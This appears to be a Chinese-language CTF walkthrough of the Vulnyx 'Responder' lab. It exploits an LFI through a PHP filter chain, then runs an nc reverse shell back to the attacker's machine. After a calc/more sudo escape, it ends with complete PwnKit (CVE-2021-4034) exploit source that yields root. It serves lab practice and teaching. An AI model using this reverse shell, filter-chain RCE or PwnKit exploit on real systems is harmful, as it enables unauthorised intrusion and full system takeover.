---

title:” Vulnyx-Responder-Walkthrough”
date:2025-02-27 15:37:32
tags:pkexec
categories:Vulnyx

信息收集

服务探测

❯ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.214  08:00:27:74:14:fc       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e5:e5:eb       VMware, Inc.

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.051 seconds (124.82 hosts/sec). 4 responded
❯ export ip=192.168.60.214
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.214:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-27 15:36 CST
Initiating ARP Ping Scan at 15:36
Scanning 192.168.60.214 [1 port]
Completed ARP Ping Scan at 15:36, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:36
Completed Parallel DNS resolution of 1 host. at 15:36, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:36
Scanning 192.168.60.214 [1 port]
Discovered open port 80/tcp on 192.168.60.214
Completed SYN Stealth Scan at 15:36, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.60.214
Host is up, received arp-response (0.00057s latency).
Scanned at 2025-02-27 15:36:39 CST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:74:14:FC (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

只开放了80端口，估计是22端口给过滤了

通过扫ipv6即可发现存在22端口

❯ ping6 -I eth0 -c 5 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1 (ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=1 ttl=64 time=0.613 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=1 ttl=1 time=0.770 ms
64 bytes from fe80::a00:27ff:fe74:14fc%eth0: icmp_seq=1 ttl=64 time=4.42 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=2 ttl=64 time=0.340 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=2 ttl=1 time=0.461 ms
64 bytes from fe80::a00:27ff:fe74:14fc%eth0: icmp_seq=2 ttl=64 time=2.50 ms
^C
--- ff02::1 ping statistics ---
2 packets transmitted, 2 received, +4 duplicates, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.340/1.517/4.417/1.486 ms
❯ nmap -6 fe80::a00:27ff:fe74:14fc
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-27 15:39 CST
Nmap scan report for fe80::a00:27ff:fe74:14fc
Host is up (0.0016s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:74:14:FC (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

扫一下80端口

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.214
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 31]
/filemanager.php      (Status: 302) [Size: 0] [--> /]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

有个提示

❯ curl $ip
your answer is in the answer..
你的答案在答案中。

LFI文件包含

访问/filemanager.php会302跳转到index.html

我尝试模糊测试一下

发现存在LFI漏洞

❯ wfuzz -c -u "http://$ip/filemanager.php?FUZZ=/etc/passwd"  -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.214/filemanager.php?FUZZ=/etc/passwd
Total requests: 56164

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000613:   302        27 L     39 W       1430 Ch     "random"

curl一下，拿到两个用户elliot rohit

❯ curl  "$ip/filemanager.php?random=/etc/passwd"|grep "/bin/bash"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1430  100  1430    0     0   679k      0 --:--:-- --:--:-- --:--:--  698k
root:x:0:0:root:/root:/bin/bash
elliot:x:1001:1001::/home/elliot:/bin/bash
rohit:x:1002:1002::/home/rohit:/bin/bash

我尝试利用php过滤器读一下网页源码

从中发现了私钥文件

❯ curl  "$ip/filemanager.php?random=php://filter/convert.base64-encode/resource=filemanager.php"|base64 -d
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2464  100  2464    0     0  1053k      0 --:--:-- --:--:-- --:--:-- 1203k
<?php
    $filename = $_GET['random'];
    include($filename);
    header('Location:/');


/*

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4

XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
X+lKp/fDKiZxmJdWu3WhLjgiXNbvX+fLiKZpWBzCAVpwSicS/jjIopzzWjE3PAB7
vRfwdqdiaFK7mQxLJ3o/yrK2CCI8ud2UlEEk8DxTMGklmff8cbhrWIc+by+9AS9t
vKd7hrsoLR6FaxBmfdO4dr1Qn9PZkvohHnMnpI7fdEC2Q3aqu6tFIODcVm6rBaII
QM0CIRdWH/WiW7XmtJUriF55rQRJq4+ShXWtWKBXyJnYvyEduqQhieJ0BA9ZJjzy
myaV1V5l0eKMhxWWBkYaz6bmFsLpbmXBBgIaiozKSKIMGWa1sWCAGv0EmMDRnDG4
ClxkqgnDcgYskrdZLPJ5YN77M9OuB30/VIGXjzskJPp2XaubzYS7BvNjTbiD5uCU
i1fHEzpPI/QeHQ25XlqlGCUla6b8mLFKMM91KcjO6TOSYgArC+kykbuqgDPMc7kt
MKhxrsykmpkNz6FxsF78k/bmstPNbYDsa4ynzlIpiQHms+papIDcsHM4rUDib8Jh
HQMfjbSchpL0YxVXAiz4Nvo33VQxp1WRh0geoO3bYz1D94FvozpeILFexnKaQeT3
GLCLNyZ1BK/p5KKh5F1OhUU0brghzks5NjFYfNoGdnKfRsOIA+6X97AiDjqg9mk4
YfbOgKHl75uELy41WzuNnuynfwWkANz7BhWV/QCLS7NiyaCucXJBJj3LRdT4Ckqf
3F1SNgshDq4vDC4RwkJW2umTmDpW0rZ3syzeb9P4/bmQXkWX/btoIJzmnB6y++Bs
XIrtZKa1yJ6/M0XA6tGTi+bnYD0wOmoU64M3l21HXvQUOXgSg5o0jIJQceTKcIN/
wLLNM0ybmzq7z+MlLGrpyOez/fSAECvagyUZRmnks0eRR1oKzMS00e+qEFJ4GmeE
Yu2dITC6I3pVRZQGcCsZWCX+BP+64Lcdz4/n5lensjab0jd28Kc72sraDteSlP/Y
wWZM9sYbXtcs14cIPpW3a1dbkOT1WGEwjt0X0F0DNgApvA8XnlTr+whJVaMByA4U
t3UQHVUINNoLnX7uSBPo96yWcwAMuXjk8j3ZaFVd5rOGq/Xd0pKBBARd2Un9QZnN
4PzEWF1d9/BObzSeo2dVEZgYXcRE3v0oEZImFIoxQcvgoxxeYjNViX0SsYEJfA9F
Pg8ZQ6R+ZjA3pU1DqBxWnErHDyeGsnVBs8VIQKOiiZMeB12Tx9b9k8E6rjRIw6La
UbzpR+4CVgToD5TZBDpHhWHdPcv3JuNAb49XGdsL889uTwBX+fSTvL6FkXtZjySX
gm6v5x/OPZg4BB/CnCWSeiG+rW0iMU4TGE5LqfuyBZBOhVcDtri3qpYLGH/5NKfw
dq15m9rReh/Jec6Z8BNi9Xo5gEjGglQA/Tfw2VqCmrsMaU3iNMNXLKrYTcsm0qHb
vRYvQl9GgeApdrZ/BY/ySb6OjNUS1Nc9Viv0AM9iCHp4tH6OfmVpnVzDuojdkXiZ
lB/vwbCo9CcBZt7lM91Hl60ZlhLsOa/69PAeC3cZR2Z1svVk1gcDrw==
-----END RSA PRIVATE KEY-----


*/

?>

爆破一下私钥文件

❯ vi id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elliott          (id_rsa)
1g 0:00:00:00 DONE (2025-02-27 15:50) 100.0g/s 339200p/s 339200c/s 339200C/s hellboy..stargirl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

尝试利用ipv6登录一下

发现都登录不上

❯ ssh elliott@fe80::a00:27ff:fe74:14fc%eth0 -i id_rsa
Enter passphrase for key 'id_rsa':
elliott@fe80::a00:27ff:fe74:14fc%eth0: Permission denied (publickey).
❯ ssh rohit@fe80::a00:27ff:fe74:14fc%eth0 -i id_rsa
Enter passphrase for key 'id_rsa':
rohit@fe80::a00:27ff:fe74:14fc%eth0: Permission denied (publickey).

LFI2Rce

既然不能登录那只能利用php过滤器拿一个www-data

HackMyVM-Medusa-Walkthrough | Pepster’Blog

❯ python3 php_filter_chain_generator.py --chain '<?=`$_GET[0]`?>'
[+] The following gadget chain will generate the following code : <?=`$_GET[0]`?> (base64 value: PD89YCRfR0VUWzBdYD8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
❯ curl  "$ip/filemanager.php?random=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=nc%20192.168.60.100%204444%20-e%20%2Fbin%2Fsh" --output -

用户提权

监听一下端口

在本地进行ssh登录可以连接⁉️

这是什么问题啊，ipv6连上就报权限拒绝

发现权限是700那连不上是正常的了

❯ pwncat-cs -lp 4444
(local) pwncat$
(remote) www-data@responder:/tmp$ ssh elliot@localhost -i id_rsa
Enter passphrase for key 'id_rsa':
Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
elliot@responder:~/.ssh$ ls -al
total 16
drwx------ 2 elliot elliot 4096 feb  1  2022 .
drwx------ 4 elliot elliot 4096 feb  1  2022 ..
-rwx------ 1 elliot elliot  398 feb  1  2022 authorized_keys
-rwx------ 1 elliot elliot 1743 feb  1  2022 id_rsa
elliot@responder:~/.ssh$ chmod 600 id_rsa

elliot用户拥有sudo权限，可以执行calc

提权至rohit

elliot@responder:~$ sudo -l
sudo: unable to resolve host responder: Nombre o servicio desconocido
Matching Defaults entries for elliot on responder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on responder:
    (rohit) NOPASSWD: /usr/bin/calc

这个可以调用more来查看help，正常利用more提权就行了

elliot@responder:~$ sudo -u rohit /usr/bin/calc
sudo: unable to resolve host responder: Nombre o servicio desconocido
C-style arbitrary precision calculator (version 2.12.7.2)
Calc is open software. For license details type:  help copyright
[Type "exit" to exit, or "help" for help.]

; help
rohit@responder:~$ cat user.txt
38ea4aa29dd3f88ad4b800af12ea42cb

Root提权

当我查找suid权限的时候发现了pkexec

rohit@responder:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/umount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

pkexec 的主要功能是提供一种机制，使非特权用户能够执行需要特权的命令。它通过验证用户的身份并检查相应的策略来决定是否允许执行命令。

需要注意的是，pkexec 曾经存在一个严重的本地提权漏洞（CVE-2021-4034），该漏洞允许非特权用户通过利用此漏洞获得 root 权限2。这个漏洞已经在最新版本的 polkit 中修复，因此建议确保系统中的 polkit 组件是最新版本。

参考文章提权即可

PolicyKit-1 0.105-31 - Privilege Escalation - Linux local Exploit

我稍微修改了一下内容才可以正常编译

exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BIN "/usr/bin/pkexec"
#define DIR "evildir"
#define EVILSO "evil"

int main()
{
    char *envp[] = {
        DIR,
        "PATH=GCONV_PATH=.",
        "SHELL=ryaagard",
        "CHARSET=ryaagard",
        NULL
    };
    char *argv[] = { NULL };

    // 创建所需的目录和文件，并设置权限
    system("mkdir -p GCONV_PATH=.");
    system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
    system("mkdir -p " DIR);
    system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
    system("cp " EVILSO ".so " DIR);

    // 使用 execve 执行命令
    execve(BIN, argv, envp);

    return 0;
}

evil-so.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <grp.h>

void gconv() {}

void gconv_init() {
    gid_t group_list[1] = {0}; // 定义一个包含单个组 ID 的数组
    setgroups(1, group_list);  // 将组列表设置为空

    setuid(0);
    setgid(0);

    char *const args[] = {"/bin/sh", NULL};
    execve("/bin/sh", args, NULL);  // 使用非空参数数组调用 execve
}

我不知道靶机设计是不是就要利用pkexec来内核提权的

因为此漏洞利用比较简单

(remote) rohit@responder:/home/rohit$ cd /tmp/
(remote) rohit@responder:/tmp$ vi exploit.c
(remote) rohit@responder:/tmp$ vi evil-so.c
(remote) rohit@responder:/tmp$ gcc -shared -o evil.so -fPIC evil-so.c
(remote) rohit@responder:/tmp$ gcc exploit.c -o exploit
(remote) rohit@responder:/tmp$ ./exploit
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
2df90c7733e54427419eee2134ebde5e